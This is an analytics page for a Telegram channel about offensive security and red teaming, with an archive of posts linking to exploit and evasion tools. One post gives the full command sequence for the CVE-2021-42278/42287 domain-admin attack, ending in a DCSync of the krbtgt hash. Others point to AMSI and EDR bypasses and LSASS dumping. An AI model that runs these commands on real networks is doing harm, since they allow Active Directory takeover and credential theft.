en
Feedback
APT

APT

Open in Telegram

This channel discusses: β€” Offensive Security β€” RedTeam β€” Malware Research β€” OSINT β€” etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Show more
Russia45 554Technologies & Applications8 834

πŸ“ˆ Analytical overview of Telegram channel APT

Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 14 682 subscribers, ranking 8 834 in the Technologies & Applications category and 45 554 in the Russia region.

πŸ“Š Audience metrics and dynamics

Since its creation on Π½Π΅Π²Ρ–Π΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 14 682 subscribers.

According to the latest data from 13 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 414 over the last 30 days and by 17 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 50.76%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 7 449 views. Within the first day, a publication typically gains 0 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 20.

πŸ“ Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
β€œThis channel discusses: β€” Offensive Security β€” RedTeam β€” Malware Research β€” OSINT β€” etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Thanks to the high frequency of updates (latest data received on 14 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

14 682
Subscribers
+1724 hours
+1027 days
+41430 days
Posts Archive
APT
APT
14 682
GitLab CI jobs unmasked passwords scanner https://github.com/Whitespots-OU/gitlab-ci-secrets #tools #secrets #devsecops

APT
APT
14 682
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #andro
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #android #apk #find #secrets #tools

APT
APT
14 682
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redte
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those w
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos. https://github.com/SecuProject/ADenum #ad #ldap #kerberos #enumeration #tools

APT
APT
14 682
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: ht
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_12.ps1 #amsi #bypass #windows #pentest

APT
APT
14 682
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller. Example: 0. Create a сomputer account addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' 1. Clear its SPNs addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController 2. Rename the computer (computer -> DC) renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' 3. Obtain a TGT getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' 4. Reset the computer name renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' 5. Bbtain a service ticket with S4U2self by presenting the previous TGT KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' 6. DCSync by presenting the service ticket KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' # https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html # https://exploit.ph/more-samaccountname-impersonation.html # https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing # https://www.geekby.site/2021/12/samaccountname-spoofing/ # https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
#meme
#meme

APT
APT
14 682
ldapconsole It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes. Features β€” Authenticate with password β€” Authenticate with LM:NT hashes β€” Authenticate with kerberos ticket https://github.com/p0dalirius/ldapconsole #ldap #query #tools

APT
APT
14 682
Log4j RCE β€” CVE-2021-44228 The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services. # https://www.lunasec.io/docs/blog/log4j-zero-day/ # https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 # https://github.com/whwlsfb/Log4j2Scan # https://github.com/Cybereason/Logout4Shell #apache #log4j #cve #rce

APT
APT
14 682
Example Reports If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports) https://github.com/nationalcptc/report_examples

APT
APT
14 682
Detecting NTLM Relay Attacks https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9 #detection #ntlm #relay #blueteam

APT
APT
14 682
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalir
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalirius/ipsourcebypass #ip #header #bypass #bugbounty

APT
APT
14 682
Process Ghosting β€” EDR Evasion The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique. https://pentestlaboratories.com/2021/12/08/process-ghosting/ #av #evasion #process #redteam #blueteam

APT
APT
14 682
MAL-CL β€” Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line execu
MAL-CL β€” Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team. https://github.com/3CORESec/MAL-CL #windows #cli #detection #blueteam #redteam

APT
APT
14 682
Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019 How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019. https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/ #kerberos #windows2019 #pentest

APT
APT
14 682
EDRSandBlast EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring. https://github.com/wavestone-cdt/EDRSandblast #lsass #dump #etw #redteam

APT
APT
14 682
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text. https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps #hiberfil #dump #password

APT
APT
14 682
Abusing Leaked Handles to Dump LSASS Memory # https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html # https://github.com/antonioCoco/MalSeclogon #seclogon #lsass #dump #redteam

APT
APT
14 682
#meme
#meme